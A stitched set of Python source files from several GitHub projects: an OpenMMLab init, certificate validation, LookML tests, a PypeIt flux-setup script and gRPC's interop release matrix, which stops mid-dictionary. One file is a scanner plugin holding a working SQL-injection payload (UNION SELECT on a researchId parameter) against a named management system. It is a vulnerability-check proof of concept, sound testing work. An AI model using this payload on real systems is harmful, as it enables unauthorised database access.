659c36c6083fd3d9d072e074a8d4b3a50342b9bd
|
582b78fd6c3240500d5cacd292339d7d1ddbb056
|
refs/heads/main
| 2023-08-28T18:14:50.423980
| 2023-08-10T09:20:06
| 2023-08-10T09:20:06
| 278,810,244
| 3,498
| 1,028
|
Apache-2.0
| 2023-09-07T06:50:44
| 2020-07-11T07:19:10
|
Python
|
UTF-8
|
Python
| false
| false
| 217
|
py
|
__init__.py
|
# Copyright (c) OpenMMLab. All rights reserved.
from .action_data_sample import ActionDataSample
from .bbox import bbox2result, bbox_target
__all__ = [
'ActionDataSample',
'bbox2result',
'bbox_target',
]
|
cce604d7c87324c908134270009a9e2f9e3e3505
|
bd9a09a3f1a8b2b5166c540ada93cc5b30591605
|
/scanner/plugins/cms/others/hnkj_researchinfo_dan_sqli.py
|
45e7bf7e021770805dc12e1b41a3c2330a28bc57
|
[
"MIT"
] |
permissive
|
iceyhexman/onlinetools
|
3cb6e349fc30c515f96429abeab5fbcc430ac0cc
|
61f2df7ff8e6ad97ca7901728c3ab749679a2bd0
|
refs/heads/master
| 2023-08-06T19:31:51.328657
| 2022-10-28T04:01:38
| 2022-10-28T04:01:38
| 119,565,769
| 1,662
| 358
|
MIT
| 2023-03-31T14:34:13
| 2018-01-30T16:51:46
|
Python
|
UTF-8
|
Python
| false
| false
| 1,064
|
py
|
hnkj_researchinfo_dan_sqli.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: 汇能群管理系统SQL注入
referer: http://wooyun.org/bugs/wooyun-2010-0152664
author: Lucifer
description: 链接/main/model/childcatalog/researchinfo_dan.jsp?researchId=1中 researchID未过滤存在SQL注入漏洞
'''
import sys
import requests
class hnkj_researchinfo_dan_sqli_BaseVerify:
def __init__(self, url):
self.url = url
def run(self):
payload = "/main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27)),3%20from%20H_System_User--"
vulnurl = self.url + payload
try:
req = requests.get(vulnurl, timeout=10, verify=False)
if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
return "[+]存在汇能群管理系统 SQL注入漏洞...(高危)\tpayload: "+vulnurl
except:
return "[-]connect timeout"
if __name__ == "__main__":
testVuln = hnkj_researchinfo_dan_sqli_BaseVerify(sys.argv[1])
testVuln.run()
|
97a940ff67563722359caa1c250e0dd069f22701
|
005dfd409cb83ebd4b284636a52230be1959fff7
|
/trust_stores_observatory/store_fetcher/root_records_validator.py
|
96d51e48bcff479bc3cc4a23c2458cf4a809dbd4
|
[
"MIT"
] |
permissive
|
nabla-c0d3/trust_stores_observatory
|
1a69d07cf0aab954d5d3ba55b80fab4bbb12c5e3
|
e74c3b1ed4e5320b3ef634a9d305c904a0b87025
|
refs/heads/master
| 2023-08-30T21:37:50.194770
| 2023-08-27T00:15:17
| 2023-08-27T00:15:17
| 115,378,349
| 113
| 18
|
MIT
| 2021-03-28T21:49:54
| 2017-12-26T02:38:24
|
HTML
|
UTF-8
|
Python
| false
| false
| 2,289
|
py
|
root_records_validator.py
|
import logging
from typing import List, Set
from trust_stores_observatory.certificates_repository import RootCertificatesRepository, CertificateNotFoundError
from trust_stores_observatory.store_fetcher.scraped_root_record import ScrapedRootCertificateRecord
from trust_stores_observatory.root_record import RootCertificateRecord
class RootRecordsValidator:
"""Given a list of subject names and SHA 256 fingerprints scraped from a web page, try to look for each
certificate in the local certificates repository and if the certificate was found, normalize the subject name
we use to refer to this certificate.
"""
@staticmethod
def validate_with_repository(
certs_repo: RootCertificatesRepository, scraped_records: List[ScrapedRootCertificateRecord]
) -> Set[RootCertificateRecord]:
validated_root_records = set()
# For each (subj_name, fingerprint) try to find the corresponding certificate in the supplied cert repo
for scraped_record in scraped_records:
try:
cert = certs_repo.lookup_certificate_with_fingerprint(
scraped_record.fingerprint, scraped_record.fingerprint_hash_algorithm
)
validated_root_records.add(RootCertificateRecord.from_certificate(cert))
except CertificateNotFoundError:
# We have never seen this certificate - use whatever name we scraped from the page
logging.error(f'Could not find certificate "{scraped_record.subject_name}" in local repository')
record = RootCertificateRecord.from_unknown_record(scraped_record)
validated_root_records.add(record)
except ValueError as e:
if "Unsupported ASN1 string type" in e.args[0]:
# Could not parse the certificate: https://github.com/pyca/cryptography/issues/3542
logging.error(f'Parsing error for certificate "{scraped_record.subject_name}"')
# Give up and just use the scraped name
record = RootCertificateRecord.from_unknown_record(scraped_record)
validated_root_records.add(record)
else:
raise
return validated_root_records
|
9dfe51527ba6f8b3b08d1e097d993acbed4f0c9c
|
568a080aaf2ecdfc566d9b3b1659ae76b1118c6e
|
/tests/test_github.py
|
f83c6a506e009ae09f68f22a008bc48f212b1f94
|
[
"MIT"
] |
permissive
|
joshtemple/lkml
|
527eb939533705d5391b0f1af6ad2dedb2faf680
|
c7545dc0567589b2e11a4d759ec66fcdd5969c5a
|
refs/heads/master
| 2023-05-25T13:42:58.831755
| 2022-10-25T17:34:58
| 2022-10-25T17:34:58
| 192,979,053
| 143
| 33
|
MIT
| 2023-05-23T00:16:02
| 2019-06-20T19:49:16
|
LookML
|
UTF-8
|
Python
| false
| false
| 1,407
|
py
|
test_github.py
|
"""Tests open-source LookML files from GitHub to catch edge cases.
Tests in this file depend on the presence of .lkml files downloaded to the /github
directory. To download these files freshly, you'll need a GitHub API token. Then, run
the script in /scripts to download the latest batch of public LookML from GitHub.
"""
from lkml.simple import DictParser, DictVisitor
from pathlib import Path
import pytest
import lkml
BASE_GITHUB_PATH = Path(__file__).parent / "resources/github"
# Define this separately so the parameterized fixture suffixes display nicely
filenames = (path.name for path in BASE_GITHUB_PATH.glob("*.lkml"))
@pytest.fixture(scope="module", params=filenames)
def lookml(request):
with (BASE_GITHUB_PATH / request.param).open("r") as file:
text = file.read()
yield text
@pytest.mark.acceptance
def test_round_trip_should_work(lookml):
# Load the LookML from file, parsing into a tree
tree = lkml.parse(lookml)
# Verify it hasn't changed once converted back to string
assert str(tree) == lookml
# Convert that parsed tree into a lossy dictionary
visitor = DictVisitor()
tree_as_dict = visitor.visit(tree)
# Parse the dictionary into a new tree
parser = DictParser()
new_tree = parser.parse(tree_as_dict)
# Verify that the string form of the tree parsed from a dictionary can be re-parsed
lkml.load(str(new_tree))
|
c74f586788a83086be19cd6c7df8255d9e1214c4
|
c3e0a6919caf85c35239ef23084df9bbf8dd61c3
|
/pypeit/scripts/flux_setup.py
|
ef6a79baebd12b333a4b112618b46130f413c3e6
|
[
"BSD-3-Clause"
] |
permissive
|
pypeit/PypeIt
|
6eb9e5afd62acc9d363e497cd9e367d620f86ea4
|
0d2e2196afc6904050b1af4d572f5c643bb07e38
|
refs/heads/release
| 2023-08-25T21:15:59.113114
| 2023-06-04T15:23:39
| 2023-06-04T15:23:39
| 36,958,428
| 136
| 98
|
BSD-3-Clause
| 2023-09-12T17:42:15
| 2015-06-05T22:25:37
|
Python
|
UTF-8
|
Python
| false
| false
| 6,497
|
py
|
flux_setup.py
|
"""
Setup files for flux calibration.
.. include common links, assuming primary doc root is up one directory
.. include:: ../include/links.rst
"""
import os
import time
import numpy as np
from astropy.table import Table
from pypeit import msgs
from pypeit import io
from pypeit.scripts import scriptbase
from pypeit import inputfiles
# TODO -- We need a test of this script
class FluxSetup(scriptbase.ScriptBase):
@classmethod
def get_parser(cls, width=None):
parser = super().get_parser(description='Setup to perform flux calibration',
width=width, formatter=scriptbase.SmartFormatter)
parser.add_argument("sci_path", type=str, help="Path for Science folder")
parser.add_argument("--objmodel", type=str, default='qso', choices=['qso', 'star', 'poly'],
help='R|science object model used in the telluric fitting. The '
'options are:\n\n'
'qso = For quasars. You might need to set redshift, '
'bal_wv_min_max in the tell file.\n'
'\n'
'star = For stars. You need to set star_type, star_ra, star_dec, '
'and star_mag in the tell_file.\n'
'\n'
'poly = For other type object, You might need to set '
'fit_wv_min_max, and norder in the tell_file.\n'
'\n')
return parser
@staticmethod
def main(args):
"""
This setups PypeIt input files for fluxing, coadding, and telluric
corrections. It will produce three files named as
your_spectragraph.flux, your_spectragraph.coadd1d, and
your_spectragraph.tell.
"""
allfiles = os.listdir(args.sci_path)
allfiles = np.sort(allfiles)
spec1dfiles = []
spec2dfiles = []
spec1dinfos = []
for ifile in allfiles:
if ('spec1d' in ifile) and ('.fits' in ifile):
spec1dfiles.append(ifile)
elif ('spec2d' in ifile) and ('.fits' in ifile):
spec2dfiles.append(ifile)
elif ('spec1d' in ifile) and ('.txt' in ifile):
spec1dinfos.append(ifile)
else:
msgs.warn('{:} is not a standard PypeIt output.'.format(ifile))
if len(spec2dfiles) > len(spec1dfiles):
msgs.warn('The following exposures do not have 1D extractions:')
for ii in range(len(spec2dfiles)):
if not os.path.exists(os.path.join(args.sci_path,
spec2dfiles[ii].replace('spec2d','spec1d'))):
msgs.info('\t {:}'.format(spec2dfiles[ii]))
if len(spec1dfiles) > 0:
par = io.fits_open(os.path.join(
args.sci_path, spec1dfiles[0]))
## fluxing pypeit file
spectrograph = par[0].header['PYP_SPEC']
pypeline = par[0].header['PYPELINE']
# Build the bits and pieces
cfg_lines = ['[fluxcalib]']
cfg_lines += [' extinct_correct = False # Set to True if your SENSFUNC derived with the UVIS algorithm\n']
cfg_lines += ['# Please add your SENSFUNC file name below before running pypeit_flux_calib']
data = Table()
data['filename'] = spec1dfiles
data['sensfile'] = ''
# Instantiate
fluxFile = inputfiles.FluxFile(
config=cfg_lines,
file_paths = [args.sci_path],
data_table=data)
# Write
flux_file = f'{spectrograph}.flux'
fluxFile.write(flux_file)
## coadd1d pypeit file
cfg_lines = ['[coadd1d]']
cfg_lines += [' coaddfile = YOUR_OUTPUT_FILE_NAME # Please set your output file name']
cfg_lines += [' sensfuncfile = YOUR_SENSFUNC_FILE # Please set your SENSFUNC file name. Only required for Echelle']
if pypeline == 'Echelle':
cfg_lines += [' wave_method = velocity # creates a uniformly space grid in log10(lambda)\n']
else:
cfg_lines += [' wave_method = linear # creates a uniformly space grid in lambda\n']
cfg_lines += ['# This file includes all extracted objects. You need to figure out which object you want to \n'+\
'# coadd before running pypeit_coadd_1dspec!!!']
all_specfiles, all_obj = [], []
for ii in range(len(spec1dfiles)):
meta_tbl = Table.read(os.path.join(args.sci_path, spec1dfiles[ii]).replace('.fits', '.txt'),
format='ascii.fixed_width')
_, indx = np.unique(meta_tbl['name'],return_index=True)
objects = meta_tbl[indx]
for jj in range(len(objects)):
all_specfiles.append(spec1dfiles[ii])
all_obj.append(objects['name'][jj])
data = Table()
data['filename'] = all_specfiles
data['obj_id'] = all_obj
# Instantiate
coadd1dFile = inputfiles.Coadd1DFile(
config=cfg_lines,
file_paths = [args.sci_path],
data_table=data)
# Write
coadd1d_file = '{:}.coadd1d'.format(spectrograph)
coadd1dFile.write(coadd1d_file)
## tellfit pypeit file
cfg_lines = ['[telluric]']
if args.objmodel == 'qso':
cfg_lines += [' objmodel = qso']
cfg_lines += [' redshift = 0.0']
cfg_lines += [' bal_wv_min_max = 10000.,11000.']
elif args.objmodel == 'star':
cfg_lines += [' objmodel = star']
cfg_lines += [' star_type = A0']
cfg_lines += [' star_mag = 0.0']
elif args.objmodel == 'poly':
cfg_lines += [' objmodel = poly']
cfg_lines += [' polyorder = 5']
cfg_lines += [' fit_wv_min_max = 17000.0,22000.0']
# Instantiate
tellFile = inputfiles.TelluricFile(
config=cfg_lines)
# Write
tellfit_file = f'{spectrograph}.tell'
tellFile.write(tellfit_file)
|
3f02da63468931b2a66c50e8ac732a918781a036
|
7d232f51e2330a4f537c50ede9c6bc023d656fd4
|
/tools/interop_matrix/client_matrix.py
|
e94a5aded8a36f8dbcd6d397f3ed3f50865cfb0c
|
[
"BSD-3-Clause",
"MPL-2.0",
"Apache-2.0"
] |
permissive
|
grpc/grpc
|
6975af3ba6f07a6fe965b875a0c09abf18999a52
|
e4d598ab64aa54f1da78c6ed6133b741742d11d4
|
refs/heads/master
| 2023-08-31T01:10:22.666618
| 2023-08-30T22:35:17
| 2023-08-30T22:35:17
| 27,729,880
| 42,330
| 13,022
|
Apache-2.0
| 2023-09-14T21:54:19
| 2014-12-08T18:58:53
|
C++
|
UTF-8
|
Python
| false
| false
| 35,591
|
py
|
client_matrix.py
|
# Copyright 2017 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Defines languages, runtimes and releases for backward compatibility testing
from collections import OrderedDict
def get_github_repo(lang):
return {
"dart": "https://github.com/grpc/grpc-dart.git",
"go": "https://github.com/grpc/grpc-go.git",
"java": "https://github.com/grpc/grpc-java.git",
"node": "https://github.com/grpc/grpc-node.git",
# all other languages use the grpc.git repo.
}.get(lang, "https://github.com/grpc/grpc.git")
def get_release_tags(lang):
"""Returns list of known releases for given language."""
return list(LANG_RELEASE_MATRIX[lang].keys())
def get_runtimes_for_lang_release(lang, release):
"""Get list of valid runtimes for given release of lang."""
runtimes = list(LANG_RUNTIME_MATRIX[lang])
release_info = LANG_RELEASE_MATRIX[lang].get(release)
if release_info and release_info.runtimes:
runtimes = list(release_info.runtimes)
return runtimes
def should_build_docker_interop_image_from_release_tag(lang):
# All dockerfile definitions live in grpc/grpc repository.
# For language that have a separate repo, we need to use
# dockerfile definitions from head of grpc/grpc.
if lang in ["go", "java", "node"]:
return False
return True
# Dictionary of default runtimes per language
LANG_RUNTIME_MATRIX = {
"cxx": ["cxx"], # This is actually debian8.
"go": ["go1.8", "go1.11", "go1.16", "go1.19"],
"java": ["java"],
"python": ["python", "pythonasyncio"],
"node": ["node"],
"ruby": ["ruby"],
"php": ["php7"],
"csharp": ["csharp", "csharpcoreclr"],
}
class ReleaseInfo:
"""Info about a single release of a language"""
def __init__(self, patch=[], runtimes=[], testcases_file=None):
self.patch = patch
self.runtimes = runtimes
self.testcases_file = testcases_file
# Dictionary of known releases for given language.
LANG_RELEASE_MATRIX = {
"cxx": OrderedDict(
[
("v1.0.1", ReleaseInfo(testcases_file="cxx__v1.0.1")),
("v1.1.4", ReleaseInfo(testcases_file="cxx__v1.0.1")),
("v1.2.5", ReleaseInfo(testcases_file="cxx__v1.0.1")),
("v1.3.9", ReleaseInfo(testcases_file="cxx__v1.0.1")),
("v1.4.2", ReleaseInfo(testcases_file="cxx__v1.0.1")),
("v1.6.6", ReleaseInfo(testcases_file="cxx__v1.0.1")),
("v1.7.2", ReleaseInfo(testcases_file="cxx__v1.0.1")),
("v1.8.0", ReleaseInfo(testcases_file="cxx__v1.0.1")),
("v1.9.1", ReleaseInfo(testcases_file="cxx__v1.0.1")),
("v1.10.1", ReleaseInfo(testcases_file="cxx__v1.0.1")),
("v1.11.1", ReleaseInfo(testcases_file="cxx__v1.0.1")),
("v1.12.0", ReleaseInfo(testcases_file="cxx__v1.0.1")),
("v1.13.0", ReleaseInfo(testcases_file="cxx__v1.0.1")),
("v1.14.1", ReleaseInfo(testcases_file="cxx__v1.0.1")),
("v1.15.0", ReleaseInfo(testcases_file="cxx__v1.0.1")),
("v1.16.0", ReleaseInfo(testcases_file="cxx__v1.0.1")),
("v1.17.1", ReleaseInfo(testcases_file="cxx__v1.0.1")),
("v1.18.0", ReleaseInfo(testcases_file="cxx__v1.0.1")),
("v1.19.0", ReleaseInfo(testcases_file="cxx__v1.0.1")),
("v1.20.0", ReleaseInfo(testcases_file="cxx__v1.31.1")),
("v1.21.4", ReleaseInfo(testcases_file="cxx__v1.31.1")),
("v1.22.0", ReleaseInfo(testcases_file="cxx__v1.31.1")),
("v1.22.1", ReleaseInfo(testcases_file="cxx__v1.31.1")),
("v1.23.0", ReleaseInfo(testcases_file="cxx__v1.31.1")),
("v1.24.0", ReleaseInfo(testcases_file="cxx__v1.31.1")),
("v1.25.0", ReleaseInfo(testcases_file="cxx__v1.31.1")),
("v1.26.0", ReleaseInfo(testcases_file="cxx__v1.31.1")),
("v1.27.3", ReleaseInfo(testcases_file="cxx__v1.31.1")),
("v1.30.0", ReleaseInfo(testcases_file="cxx__v1.31.1")),
("v1.31.1", ReleaseInfo(testcases_file="cxx__v1.31.1")),
("v1.32.0", ReleaseInfo()),
("v1.33.2", ReleaseInfo()),
("v1.34.0", ReleaseInfo()),
("v1.35.0", ReleaseInfo()),
("v1.36.3", ReleaseInfo()),
("v1.37.0", ReleaseInfo()),
("v1.38.0", ReleaseInfo()),
("v1.39.0", ReleaseInfo()),
("v1.41.1", ReleaseInfo()),
("v1.42.0", ReleaseInfo()),
("v1.43.0", ReleaseInfo()),
("v1.44.0", ReleaseInfo()),
("v1.46.2", ReleaseInfo()),
("v1.47.1", ReleaseInfo()),
("v1.48.3", ReleaseInfo()),
("v1.49.1", ReleaseInfo()),
("v1.52.0", ReleaseInfo()),
("v1.53.0", ReleaseInfo()),
("v1.54.0", ReleaseInfo()),
("v1.55.0", ReleaseInfo()),
("v1.56.0", ReleaseInfo()),
("v1.57.0", ReleaseInfo()),
]
),
"go": OrderedDict(
[
(
"v1.0.5",
ReleaseInfo(runtimes=["go1.8"], testcases_file="go__v1.0.5"),
),
(
"v1.2.1",
ReleaseInfo(runtimes=["go1.8"], testcases_file="go__v1.0.5"),
),
(
"v1.3.0",
ReleaseInfo(runtimes=["go1.8"], testcases_file="go__v1.0.5"),
),
(
"v1.4.2",
ReleaseInfo(runtimes=["go1.8"], testcases_file="go__v1.0.5"),
),
(
"v1.5.2",
ReleaseInfo(runtimes=["go1.8"], testcases_file="go__v1.0.5"),
),
(
"v1.6.0",
ReleaseInfo(runtimes=["go1.8"], testcases_file="go__v1.0.5"),
),
(
"v1.7.4",
ReleaseInfo(runtimes=["go1.8"], testcases_file="go__v1.0.5"),
),
(
"v1.8.2",
ReleaseInfo(runtimes=["go1.8"], testcases_file="go__v1.0.5"),
),
(
"v1.9.2",
ReleaseInfo(runtimes=["go1.8"], testcases_file="go__v1.0.5"),
),
(
"v1.10.1",
ReleaseInfo(runtimes=["go1.8"], testcases_file="go__v1.0.5"),
),
(
"v1.11.3",
ReleaseInfo(runtimes=["go1.8"], testcases_file="go__v1.0.5"),
),
(
"v1.12.2",
ReleaseInfo(runtimes=["go1.8"], testcases_file="go__v1.0.5"),
),
(
"v1.13.0",
ReleaseInfo(runtimes=["go1.8"], testcases_file="go__v1.0.5"),
),
(
"v1.14.0",
ReleaseInfo(runtimes=["go1.8"], testcases_file="go__v1.0.5"),
),
(
"v1.15.0",
ReleaseInfo(runtimes=["go1.8"], testcases_file="go__v1.0.5"),
),
(
"v1.16.0",
ReleaseInfo(runtimes=["go1.8"], testcases_file="go__v1.0.5"),
),
(
"v1.17.0",
ReleaseInfo(runtimes=["go1.11"], testcases_file="go__v1.0.5"),
),
(
"v1.18.0",
ReleaseInfo(runtimes=["go1.11"], testcases_file="go__v1.0.5"),
),
(
"v1.19.0",
ReleaseInfo(runtimes=["go1.11"], testcases_file="go__v1.0.5"),
),
(
"v1.20.0",
ReleaseInfo(runtimes=["go1.11"], testcases_file="go__v1.20.0"),
),
(
"v1.21.3",
ReleaseInfo(runtimes=["go1.11"], testcases_file="go__v1.20.0"),
),
(
"v1.22.3",
ReleaseInfo(runtimes=["go1.11"], testcases_file="go__v1.20.0"),
),
(
"v1.23.1",
ReleaseInfo(runtimes=["go1.11"], testcases_file="go__v1.20.0"),
),
(
"v1.24.0",
ReleaseInfo(runtimes=["go1.11"], testcases_file="go__v1.20.0"),
),
(
"v1.25.0",
ReleaseInfo(runtimes=["go1.11"], testcases_file="go__v1.20.0"),
),
(
"v1.26.0",
ReleaseInfo(runtimes=["go1.11"], testcases_file="go__v1.20.0"),
),
(
"v1.27.1",
ReleaseInfo(runtimes=["go1.11"], testcases_file="go__v1.20.0"),
),
(
"v1.28.0",
ReleaseInfo(runtimes=["go1.11"], testcases_file="go__v1.20.0"),
),
(
"v1.29.0",
ReleaseInfo(runtimes=["go1.11"], testcases_file="go__v1.20.0"),
),
(
"v1.30.0",
ReleaseInfo(runtimes=["go1.11"], testcases_file="go__v1.20.0"),
),
(
"v1.31.1",
ReleaseInfo(runtimes=["go1.11"], testcases_file="go__v1.20.0"),
),
(
"v1.32.0",
ReleaseInfo(runtimes=["go1.11"], testcases_file="go__v1.20.0"),
),
(
"v1.33.1",
ReleaseInfo(runtimes=["go1.11"], testcases_file="go__v1.20.0"),
),
("v1.34.0", ReleaseInfo(runtimes=["go1.11"])),
("v1.35.0", ReleaseInfo(runtimes=["go1.11"])),
("v1.36.0", ReleaseInfo(runtimes=["go1.11"])),
("v1.37.0", ReleaseInfo(runtimes=["go1.11"])),
# NOTE: starting from release v1.38.0, use runtimes=['go1.16']
("v1.38.1", ReleaseInfo(runtimes=["go1.16"])),
("v1.39.1", ReleaseInfo(runtimes=["go1.16"])),
("v1.40.0", ReleaseInfo(runtimes=["go1.16"])),
("v1.41.0", ReleaseInfo(runtimes=["go1.16"])),
("v1.42.0", ReleaseInfo(runtimes=["go1.16"])),
("v1.43.0", ReleaseInfo(runtimes=["go1.16"])),
("v1.44.0", ReleaseInfo(runtimes=["go1.16"])),
("v1.45.0", ReleaseInfo(runtimes=["go1.16"])),
("v1.46.0", ReleaseInfo(runtimes=["go1.16"])),
("v1.47.0", ReleaseInfo(runtimes=["go1.16"])),
("v1.48.0", ReleaseInfo(runtimes=["go1.16"])),
("v1.49.0", ReleaseInfo(runtimes=["go1.16"])),
("v1.50.1", ReleaseInfo(runtimes=["go1.16"])),
("v1.51.0", ReleaseInfo(runtimes=["go1.16"])),
("v1.52.3", ReleaseInfo(runtimes=["go1.19"])),
("v1.53.0", ReleaseInfo(runtimes=["go1.19"])),
("v1.54.1", ReleaseInfo(runtimes=["go1.19"])),
("v1.55.0", ReleaseInfo(runtimes=["go1.19"])),
("v1.56.2", ReleaseInfo(runtimes=["go1.19"])),
("v1.57.0", ReleaseInfo(runtimes=["go1.19"])),
]
),
"java": OrderedDict(
[
(
"v1.0.3",
ReleaseInfo(
runtimes=["java_oracle8"], testcases_file="java__v1.0.3"
),
),
(
"v1.1.2",
ReleaseInfo(
runtimes=["java_oracle8"], testcases_file="java__v1.0.3"
),
),
(
"v1.2.0",
ReleaseInfo(
runtimes=["java_oracle8"], testcases_file="java__v1.0.3"
),
),
(
"v1.3.1",
ReleaseInfo(
runtimes=["java_oracle8"], testcases_file="java__v1.0.3"
),
),
(
"v1.4.0",
ReleaseInfo(
runtimes=["java_oracle8"], testcases_file="java__v1.0.3"
),
),
(
"v1.5.0",
ReleaseInfo(
runtimes=["java_oracle8"], testcases_file="java__v1.0.3"
),
),
(
"v1.6.1",
ReleaseInfo(
runtimes=["java_oracle8"], testcases_file="java__v1.0.3"
),
),
("v1.7.1", ReleaseInfo(testcases_file="java__v1.0.3")),
(
"v1.8.0",
ReleaseInfo(
runtimes=["java_oracle8"], testcases_file="java__v1.0.3"
),
),
(
"v1.9.1",
ReleaseInfo(
runtimes=["java_oracle8"], testcases_file="java__v1.0.3"
),
),
(
"v1.10.1",
ReleaseInfo(
runtimes=["java_oracle8"], testcases_file="java__v1.0.3"
),
),
(
"v1.11.0",
ReleaseInfo(
runtimes=["java_oracle8"], testcases_file="java__v1.0.3"
),
),
("v1.12.1", ReleaseInfo(testcases_file="java__v1.0.3")),
("v1.13.2", ReleaseInfo(testcases_file="java__v1.0.3")),
(
"v1.14.0",
ReleaseInfo(
runtimes=["java_oracle8"], testcases_file="java__v1.0.3"
),
),
("v1.15.1", ReleaseInfo(testcases_file="java__v1.0.3")),
(
"v1.16.1",
ReleaseInfo(
runtimes=["java_oracle8"], testcases_file="java__v1.0.3"
),
),
("v1.17.2", ReleaseInfo(testcases_file="java__v1.0.3")),
(
"v1.18.0",
ReleaseInfo(
runtimes=["java_oracle8"], testcases_file="java__v1.0.3"
),
),
(
"v1.19.0",
ReleaseInfo(
runtimes=["java_oracle8"], testcases_file="java__v1.0.3"
),
),
("v1.20.0", ReleaseInfo(runtimes=["java_oracle8"])),
("v1.21.1", ReleaseInfo()),
("v1.22.2", ReleaseInfo()),
("v1.23.0", ReleaseInfo()),
("v1.24.0", ReleaseInfo()),
("v1.25.0", ReleaseInfo()),
("v1.26.1", ReleaseInfo()),
("v1.27.2", ReleaseInfo()),
("v1.28.1", ReleaseInfo()),
("v1.29.0", ReleaseInfo()),
("v1.30.2", ReleaseInfo()),
("v1.31.2", ReleaseInfo()),
("v1.32.3", ReleaseInfo()),
("v1.33.1", ReleaseInfo()),
("v1.34.1", ReleaseInfo()),
("v1.35.1", ReleaseInfo()),
("v1.36.3", ReleaseInfo()),
("v1.37.1", ReleaseInfo()),
("v1.38.1", ReleaseInfo()),
("v1.39.0", ReleaseInfo()),
("v1.40.2", ReleaseInfo()),
("v1.41.3", ReleaseInfo()),
("v1.42.3", ReleaseInfo()),
("v1.43.3", ReleaseInfo()),
("v1.44.2", ReleaseInfo()),
("v1.45.4", ReleaseInfo()),
("v1.46.1", ReleaseInfo()),
("v1.47.1", ReleaseInfo()),
("v1.48.2", ReleaseInfo()),
("v1.49.2", ReleaseInfo()),
("v1.50.3", ReleaseInfo()),
("v1.51.3", ReleaseInfo()),
("v1.52.1", ReleaseInfo()),
("v1.53.0", ReleaseInfo()),
("v1.54.0", ReleaseInfo()),
("v1.55.1", ReleaseInfo()),
("v1.56.0", ReleaseInfo()),
("v1.57.2", ReleaseInfo()),
]
),
"python": OrderedDict(
[
(
"v1.0.x",
ReleaseInfo(
runtimes=["python"], testcases_file="python__v1.0.x"
),
),
(
"v1.1.4",
ReleaseInfo(
runtimes=["python"], testcases_file="python__v1.0.x"
),
),
(
"v1.2.5",
ReleaseInfo(
runtimes=["python"], testcases_file="python__v1.0.x"
),
),
(
"v1.3.9",
ReleaseInfo(
runtimes=["python"], testcases_file="python__v1.0.x"
),
),
(
"v1.4.2",
ReleaseInfo(
runtimes=["python"], testcases_file="python__v1.0.x"
),
),
(
"v1.6.6",
ReleaseInfo(
runtimes=["python"], testcases_file="python__v1.0.x"
),
),
(
"v1.7.2",
ReleaseInfo(
runtimes=["python"], testcases_file="python__v1.0.x"
),
),
(
"v1.8.1",
ReleaseInfo(
runtimes=["python"], testcases_file="python__v1.0.x"
),
),
(
"v1.9.1",
ReleaseInfo(
runtimes=["python"], testcases_file="python__v1.0.x"
),
),
(
"v1.10.1",
ReleaseInfo(
runtimes=["python"], testcases_file="python__v1.0.x"
),
),
(
"v1.11.1",
ReleaseInfo(
runtimes=["python"], testcases_file="python__v1.11.1"
),
),
(
"v1.12.0",
ReleaseInfo(
runtimes=["python"], testcases_file="python__v1.11.1"
),
),
(
"v1.13.0",
ReleaseInfo(
runtimes=["python"], testcases_file="python__v1.11.1"
),
),
(
"v1.14.1",
ReleaseInfo(
runtimes=["python"], testcases_file="python__v1.11.1"
),
),
(
"v1.15.0",
ReleaseInfo(
runtimes=["python"], testcases_file="python__v1.11.1"
),
),
(
"v1.16.0",
ReleaseInfo(
runtimes=["python"], testcases_file="python__v1.11.1"
),
),
(
"v1.17.1",
ReleaseInfo(
runtimes=["python"], testcases_file="python__v1.11.1"
),
),
(
"v1.18.0",
ReleaseInfo(
runtimes=["python"], testcases_file="python__v1.18.0"
),
),
(
"v1.19.0",
ReleaseInfo(
runtimes=["python"], testcases_file="python__v1.18.0"
),
),
(
"v1.20.0",
ReleaseInfo(
runtimes=["python"], testcases_file="python__v1.18.0"
),
),
(
"v1.21.4",
ReleaseInfo(
runtimes=["python"], testcases_file="python__v1.18.0"
),
),
(
"v1.22.0",
ReleaseInfo(
runtimes=["python"], testcases_file="python__v1.18.0"
),
),
(
"v1.22.1",
ReleaseInfo(
runtimes=["python"], testcases_file="python__v1.18.0"
),
),
(
"v1.23.0",
ReleaseInfo(
runtimes=["python"], testcases_file="python__v1.18.0"
),
),
(
"v1.24.0",
ReleaseInfo(
runtimes=["python"], testcases_file="python__v1.18.0"
),
),
(
"v1.25.0",
ReleaseInfo(
runtimes=["python"], testcases_file="python__v1.18.0"
),
),
(
"v1.26.0",
ReleaseInfo(
runtimes=["python"], testcases_file="python__v1.18.0"
),
),
(
"v1.27.3",
ReleaseInfo(
runtimes=["python"], testcases_file="python__v1.18.0"
),
),
(
"v1.30.0",
ReleaseInfo(
runtimes=["python"], testcases_file="python__v1.18.0"
),
),
(
"v1.31.1",
ReleaseInfo(
runtimes=["python"], testcases_file="python__v1.18.0"
),
),
(
"v1.32.0",
ReleaseInfo(
runtimes=["python"], testcases_file="python__v1.18.0"
),
),
(
"v1.33.2",
ReleaseInfo(
runtimes=["python"], testcases_file="python__v1.18.0"
),
),
(
"v1.34.0",
ReleaseInfo(
runtimes=["python"], testcases_file="python__v1.18.0"
),
),
(
"v1.35.0",
ReleaseInfo(
runtimes=["python"], testcases_file="python__v1.18.0"
),
),
(
"v1.36.3",
ReleaseInfo(
runtimes=["python"], testcases_file="python__v1.18.0"
),
),
(
"v1.37.0",
ReleaseInfo(
runtimes=["python"], testcases_file="python__v1.18.0"
),
),
(
"v1.38.0",
ReleaseInfo(
runtimes=["python"], testcases_file="python__v1.18.0"
),
),
(
"v1.39.0",
ReleaseInfo(
runtimes=["python"], testcases_file="python__v1.18.0"
),
),
(
"v1.41.1",
ReleaseInfo(
runtimes=["python"], testcases_file="python__v1.41.1"
),
),
(
"v1.42.0",
ReleaseInfo(
runtimes=["python"], testcases_file="python__v1.41.1"
),
),
(
"v1.43.2",
ReleaseInfo(
runtimes=["python"], testcases_file="python__v1.41.1"
),
),
(
"v1.44.0",
ReleaseInfo(
runtimes=["python"], testcases_file="python__master"
),
),
(
"v1.46.2",
